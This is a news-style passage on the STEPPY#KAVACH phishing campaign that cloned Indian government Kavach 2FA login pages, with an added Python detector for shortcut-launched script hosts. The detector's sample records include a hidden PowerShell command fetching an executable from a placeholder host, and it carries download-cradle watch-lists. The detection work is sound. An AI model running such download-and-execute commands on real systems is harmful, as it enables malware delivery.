Throughout the history of cyber conflict, Pakistan and India have carried out a long list of attacks against each other to gather intelligence.
Recently, Kavach, the mandatory two-factor authentication (2FA) solution, fell victim to a malicious phishing campaign, STEPPY#KAVACH, that aims to steal the credentials of Indian government employees.
According to the cybersecurity firm Securonix, the threat actor's tradecraft closely resembles that of the SideCopy APT, based in Pakistan.
The threat actor has been running discreet credential-theft attacks by cloning Indian government websites so that victims land on a fake login page, where they follow the mandatory process and enter their data.
According to the technical report published by Securonix, “LNK files are used to initiate code execution which eventually downloads and runs a malicious C# payload, which functions as a remote access trojan (RAT)”.
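The chain the quoted report describes, a shortcut opened from Explorer that starts a script host which then fetches and runs a payload, can be turned into a simple detection. The following is an added example, not code from the article or from Securonix: a small Python detector over constructed process-creation records whose field names are loosely modelled on Sysmon process-creation events (not a real log format). It flags events where a script host is spawned by Explorer and the command line also shows a download cradle or a hidden window. The watch-lists, the scoring threshold and all sample lines are assumptions chosen here.

```python
"""Added example (not from the article or Securonix): flag process-creation
records consistent with shortcut-initiated execution that downloads a payload.
Record format, field names and sample lines are constructed for this example."""
import re
from dataclasses import dataclass

# Interpreters a shortcut target commonly launches (assumed watch-list)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Command-line fragments that indicate content is fetched from the network
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|downloadstring|downloadfile|iwr\b|curl\b|bitsadmin|https?://)",
    re.I)
# PowerShell flags that hide the console window from the user
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line):
    """Parse 'Key=Value | Key=Value' records (constructed format) into a ProcEvent."""
    fields = dict(part.split("=", 1) for part in line.split(" | "))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def score_event(ev):
    """Return the list of reasons this event looks like shortcut-initiated execution."""
    reasons = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe" and child in SCRIPT_HOSTS:
        reasons.append("script host launched from Explorer (shortcut double-click)")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("command line fetches content from the network")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("console window hidden from the user")
    return reasons


def detect(lines, min_reasons=2):
    """Return (image, reasons) for every record that meets the reason threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev.image, reasons))
    return hits


# Constructed sample records; hosts and paths are placeholders, not real indicators.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r" | CommandLine=powershell.exe -w hidden -c iwr http://example.invalid/p.txt -OutFile $env:TEMP\p.exe",
    r"ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\notepad.exe"
    r" | CommandLine=notepad.exe C:\Users\u\Desktop\notes.txt",
    r"ParentImage=C:\Windows\System32\svchost.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r" | CommandLine=powershell.exe -File C:\scripts\inventory.ps1",
    # one reason only (Explorer -> cmd.exe), stays below the threshold
    r"ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\cmd.exe"
    r" | CommandLine=cmd.exe /c echo hello",
]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS):
        print(image)
        for r in reasons:
            print("  -", r)
```

A single reason (for example Explorer starting cmd.exe) is too common to alert on by itself, so the detector requires at least two; the threshold and watch-lists should be tuned against the environment's own baseline of shortcut usage.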
This is not entirely a new practice. Kavach-themed lure apps have been co-opted by another threat actor, Transparent Tribe, in its attacks targeting India since the start of the year. Transparent Tribe, also known as APT36, Operation C-Major, and Mythic Leopard, is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.
It is also known to mimic the attack chains of the Indian APT group SideWinder, a prolific nation-state group that disproportionately singles out Pakistan-based military entities, in order to deploy its own toolset. SideWinder, which has become infamous for targeting governments and enterprises